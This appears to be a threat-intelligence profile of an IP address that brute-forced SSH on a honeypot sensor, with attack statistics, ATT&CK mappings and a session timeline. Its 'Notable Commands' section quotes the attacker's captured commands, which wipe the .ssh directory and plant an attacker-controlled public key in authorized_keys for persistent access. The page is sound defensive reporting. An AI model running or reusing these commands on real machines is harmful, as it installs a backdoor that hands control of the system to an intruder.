IntrusionLabs / threat intelligence

Sign in

← Back to feed

129.205.2.18

Threat Confidence

48%

Location

🇺🇬 UG / Kampala

ASN

AS37063 · Roke Investments International

Cloud Provider

—

Total Events

285

Top 10% by volume

Agent Count

1

First / Last Seen

2026-04-08 08:10 — 2026-04-08 09:15

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Reconnaissance

T1595

Initial Access

T1078

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Discovery

T1046

Command and Control

T1105

External Corroboration

Not flagged by any external feeds

Campaigns

Not associated with any campaigns

Session Forensics

scanner ×2 malware_dropper ×9 credential_harvester ×23 opportunistic_bruter ×9

Sessions

43 (18 with login)

Avg Depth Score

0.51

Commands Executed

27

Files Downloaded

9

Notable Commands

cd ~; chattr -ia .ssh; lockr -ia .ssh
lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Fingerprints

HASSH

03a80b21afa810682a776a7d42e5e6fb

SSH Client

SSH-2.0-libssh_0.11.1

Evidence Timeline

Malware Dropper f4aa9019717a w4m_seattle_01 · 2026-04-08 09:14

3 1 1 100%

Loading events...

Opportunistic Bruter 381e7cdd6147 w4m_seattle_01 · 2026-04-08 09:14

1 50%

Loading events...

Credential Harvester f5dd6dc92761 w4m_seattle_01 · 2026-04-08 09:14

1 35%

Loading events...

Opportunistic Bruter 09548159e1ab w4m_seattle_01 · 2026-04-08 09:12

1 50%

Loading events...

Malware Dropper 8af2b8faf473 w4m_seattle_01 · 2026-04-08 09:12

3 1 1 100%

Loading events...

Credential Harvester a1f6a02007a5 w4m_seattle_01 · 2026-04-08 09:12

1 35%

Loading events...

Credential Harvester 832124d1ae17 w4m_seattle_01 · 2026-04-08 09:09

1 35%

Loading events...

Opportunistic Bruter baf759ff1824 w4m_seattle_01 · 2026-04-08 09:07

1 50%

Loading events...

Malware Dropper 9d31561c6efb w4m_seattle_01 · 2026-04-08 09:07

3 1 1 100%

Loading events...

Credential Harvester 3f5114dc6bbd w4m_seattle_01 · 2026-04-08 09:07

1 35%

Loading events...

Scanner 7c03e8345313 w4m_seattle_01 · 2026-04-08 09:04

15%

Loading events...

Opportunistic Bruter e527d5e87c94 w4m_seattle_01 · 2026-04-08 09:02

1 50%

Loading events...

Malware Dropper bb3ffaba738a w4m_seattle_01 · 2026-04-08 09:01

3 1 1 100%

Loading events...

Credential Harvester a0ecdd1de0e6 w4m_seattle_01 · 2026-04-08 09:02

1 35%

Loading events...

Credential Harvester bc4af757fec9 w4m_seattle_01 · 2026-04-08 08:59

1 35%

Loading events...

Credential Harvester 43e830fdc297 w4m_seattle_01 · 2026-04-08 08:56

1 35%

Loading events...

Credential Harvester a3a87b6a6900 w4m_seattle_01 · 2026-04-08 08:54

1 35%

Loading events...

Malware Dropper 739a084ab71c w4m_seattle_01 · 2026-04-08 08:51

3 1 1 100%

Loading events...

Opportunistic Bruter 2e964d4cd314 w4m_seattle_01 · 2026-04-08 08:52

1 50%

Loading events...

Credential Harvester ff889a490dc9 w4m_seattle_01 · 2026-04-08 08:51

1 35%

Loading events...

Credential Harvester cbac9c6c9f94 w4m_seattle_01 · 2026-04-08 08:49

1 35%

Loading events...

Opportunistic Bruter f2b0168df60b w4m_seattle_01 · 2026-04-08 08:46

1 50%

Loading events...

Malware Dropper d2271d59226f w4m_seattle_01 · 2026-04-08 08:46

3 1 1 100%

Loading events...

Credential Harvester c3befc267f9d w4m_seattle_01 · 2026-04-08 08:46

1 35%

Loading events...

Credential Harvester 1764c2809cf7 w4m_seattle_01 · 2026-04-08 08:43

1 35%

Loading events...

Credential Harvester 50bbc21dba6c w4m_seattle_01 · 2026-04-08 08:41

1 35%

Loading events...

Credential Harvester 927f17cd1928 w4m_seattle_01 · 2026-04-08 08:38

1 35%

Loading events...

Malware Dropper 8c3426baa56c w4m_seattle_01 · 2026-04-08 08:35

3 1 1 100%

Loading events...

Opportunistic Bruter 8c7adb27012f w4m_seattle_01 · 2026-04-08 08:35

1 50%

Loading events...

Credential Harvester 9e2ebc3318fb w4m_seattle_01 · 2026-04-08 08:35

1 35%

Loading events...

Credential Harvester c4cd8c84f03c w4m_seattle_01 · 2026-04-08 08:33

1 35%

Loading events...

Scanner 6c669f10438f w4m_seattle_01 · 2026-04-08 08:30

15%

Loading events...

Credential Harvester 5c1f10a9fe7f w4m_seattle_01 · 2026-04-08 08:27

1 35%

Loading events...

Credential Harvester 79416dfe9fca w4m_seattle_01 · 2026-04-08 08:25

1 35%

Loading events...

Opportunistic Bruter 9a761bb617b1 w4m_seattle_01 · 2026-04-08 08:22

1 50%

Loading events...

Malware Dropper 52a12d69911e w4m_seattle_01 · 2026-04-08 08:22

3 1 1 100%

Loading events...

Credential Harvester 938118b66588 w4m_seattle_01 · 2026-04-08 08:22

1 35%

Loading events...

Credential Harvester 42fecce0168e w4m_seattle_01 · 2026-04-08 08:19

1 35%

Loading events...

Credential Harvester b76d230cf73c w4m_seattle_01 · 2026-04-08 08:17

1 35%

Loading events...

Opportunistic Bruter f94aaace7472 w4m_seattle_01 · 2026-04-08 08:14

1 50%

Loading events...

Malware Dropper 3b7644834283 w4m_seattle_01 · 2026-04-08 08:14

3 1 1 100%

Loading events...

Credential Harvester 86516a5088ca w4m_seattle_01 · 2026-04-08 08:14

1 35%

Loading events...

Credential Harvester 905789572767 w4m_seattle_01 · 2026-04-08 08:10

1 35%

Loading events...